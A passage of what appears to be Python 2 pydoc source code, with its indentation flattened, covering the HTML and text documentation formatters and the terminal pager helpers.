cache[path] = sys.modules[path] # prevent module from clearing
del sys.modules[path]
try:
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and \
split(lower(str(value)))[:2] == ['no', 'module']:
# The module was not found.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
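# Illustrative behaviour (comments only): for a dotted path the module at the end of the
# path is returned, and a module that cannot be found yields None instead of raising.
#     safeimport('xml.dom.minidom')   # -> the xml.dom.minidom module object
#     safeimport('no.such.module')    # -> None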
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://www.python.org/doc/current/lib")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages'))))):
htmlfile = "module-%s.html" % object.__name__
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), htmlfile)
else:
docloc = os.path.join(docloc, htmlfile)
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!doctype html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">&nbsp;<br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or '&nbsp;')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap='&nbsp;'):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + '&nbsp;' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', '&nbsp;', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)/cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100/cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, (name, path, ispackage, shadowed)):
"""Make a link for a module or package to display in an index."""
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '&quot;')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/peps/pep-%04d.html' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
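# Illustrative example (editorial note): with funcs={'spam': '#-spam'}, a call like
# self.markup('See RFC 2822 and spam().', self.escape, funcs) yields, approximately,
#   'See <a href="http://www.rfc-editor.org/rfc/rfc2822.txt">RFC 2822</a> and
#    <a href="#-spam">spam</a>().'
# Plain words fall through namelink() unchanged; the exact escaping depends on the
# escape function passed in, and the 'spam' mapping above is purely hypothetical.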
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
modnames = []
for file in os.listdir(object.__path__[0]):
path = os.path.join(object.__path__[0], file)
modname = inspect.getmodulename(file)
if modname != '__init__':
if modname and modname not in modnames:
modpkgs.append((modname, name, 0, 0))
modnames.append(modname)
elif ispackage(path):
modpkgs.append((file, name, 1, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda (key, value), s=self: s.modulelink(value))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda (key, value): value, classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name), name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spillproperties(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docproperty(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if callable(value) or inspect.isdatadescriptor(value):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda (name, kind, cls, value): visiblename(name),
inspect.classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
value = getattr(object, key)
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
attrs.sort(key=lambda t: t[0])
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spillproperties('Properties %s' % tag, attrs,
lambda t: t[1] == 'property')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br>&nbsp;</tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docproperty(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
for attr, tag in [('fget', '<em>get</em>'),
('fset', '<em>set</em>'),
('fdel', '<em>delete</em>')]:
func = getattr(value, attr)
if func is not None:
base = self.document(func, tag, mod)
push('<dd>%s</dd>\n' % base)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docproperty(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
seen = {}
files = os.listdir(dir)
def found(name, ispackage,
modpkgs=modpkgs, shadowed=shadowed, seen=seen):
if name not in seen:
modpkgs.append((name, '', ispackage, name in shadowed))
seen[name] = 1
shadowed[name] = 1
# Package spam/__init__.py takes precedence over module spam.py.
for file in files:
path = os.path.join(dir, file)
if ispackage(path): found(file, 1)
for file in files:
path = os.path.join(dir, file)
if os.path.isfile(path):
modname = inspect.getmodulename(file)
if modname: found(modname, 0)
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
if hasattr(object, '__path__'):
modpkgs = []
for file in os.listdir(object.__path__[0]):
path = os.path.join(object.__path__[0], file)
modname = inspect.getmodulename(file)
if modname != '__init__':
if modname and modname not in modpkgs:
modpkgs.append(modname)
elif ispackage(path):
modpkgs.append(file + ' (package)')
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
if classes:
classlist = map(lambda (key, value): value, classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, 70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name),
name, mod, object))
return attrs
def spillproperties(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docproperty(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if callable(value) or inspect.isdatadescriptor(value):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, 70, doc) + '\n')
return attrs
attrs = filter(lambda (name, kind, cls, value): visiblename(name),
inspect.classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spillproperties("Properties %s:\n" % tag, attrs,
lambda t: t[1] == 'property')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = 'lambda'
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docproperty(self, name, value, mod):
results = []
push = results.append
if name:
push(name)
need_blank_after_doc = 0
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
need_blank_after_doc = 1
for attr, tag in [('fget', '<get>'),
('fset', '<set>'),
('fdel', '<delete>')]:
func = getattr(value, attr)
if func is not None:
if need_blank_after_doc:
push('')
need_blank_after_doc = 0
base = self.document(func, tag, mod)
push(self.indent(base))
return '\n'.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docproperty(name, object, mod)
def docother(self, object, name=None, mod=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if os.environ.get('TERM') in ['dumb', 'emacs']:
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ['dumb', 'emacs']:
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more %s' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' ' + filename)
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = split(plain(text), '\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = int(os.environ.get('LINES', 25)) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ['q', 'Q']:
sys.stdout.write('\r \r')
break
elif c in ['\r', '\n']:
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ['b', 'B', '\x1b']:
r = r - inc - inc
if r < 0: r = 0
